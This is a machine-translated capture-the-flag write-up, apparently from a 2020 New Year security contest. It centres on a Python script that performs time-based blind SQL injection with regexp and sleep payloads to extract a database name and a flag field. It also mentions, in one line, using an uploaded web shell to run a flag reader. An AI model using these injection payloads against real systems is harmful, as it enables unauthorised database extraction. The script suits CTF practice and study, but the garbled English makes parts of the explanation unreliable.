2020 New Year tournament Contagion public network security blind on the first day of Note

0x00 feel he is still too dishes

0x01 blasting database name:

Test filtered WAF = <> select

Here direct injection given database name of the script:

def http_blindTime_get(url,payload):
    #记录发包时间
    starttime = time.time()
    result = requests.get(url+payload)
    #记录收包时间
    endtime = time.time()
    if(endtime-starttime<3):
        return False
    else:
        return True
#get方式获取数据库名，攻击载荷需修改函数变量构造
def getDatabaseName(url):
    #先获取数据库长度,推测不会长于16个字符,故range 0,10
    #逻辑为当数据库长度正确时使数据库休眠5秒，故当收发包时间差大于3s时break
    batabaselength = 0
    for i in range(0, 15):
        payload = "index.php?id=233333||if((length(database())%20regexp%20"+str(i)+"),sleep(5),2)"
        if http_blindTime_get(url,payload):
            databaselength = i
            break
    print('数据库名长度:',str(databaselength))
    if databaselength==0:
        return False
    else:
        #获取的数据库长度不为0，表明成功获取数据库长度，爆数据库名
        databasename=""
        for i in range(1,databaselength+1):
            for j in range(50, 128):
                payload = "index.php?id=23333||if((ascii(substr(database(),"+str(i)+",1))%20regexp%20"+str(j)+"),sleep(50),2)"
                if(http_blindTime_get(url, payload)):
                    print('找到code:'+str(j))
                    databasename += chr(j)
                    break
        print('数据库名:', str(databasename))
        return databasename

def main():
    url="http://36ca1c4d3df24bd3ae5e3b03df1f3379f351f0edfad943d4.changame.ichunqiu.com/"
    getDatabaseName(url)
    # get_all_databases("http://192.168.110.167/web/web26/")
if __name__ == '__main__':
    main()

Run the code database called burst time according to the time blinds.

Then find how select all around the past, according to the bigwigs of the solution, because the title has to tell us flag in the field fl4g inside, you do not need Zaibao table and field names, and so bypass the direct use of regexp:

把payload换成payload = " if((substr((fl4g),i,1) regexp "+chr+"),sleep(3),1)"
#相当于 1 and if(fl4g = regexp 'flag{+ alphbat' ,sleep(5),1)

With this payload, a building-by-ascii table alphbat try to burst out the flag

Also given wp ezupload of:

No filter is a direct file upload, there is a flag found at the root of a word after uploading directly execute the command ./readflag able to get the flag ......

This question is the topic I heard people overturned. . . . . . .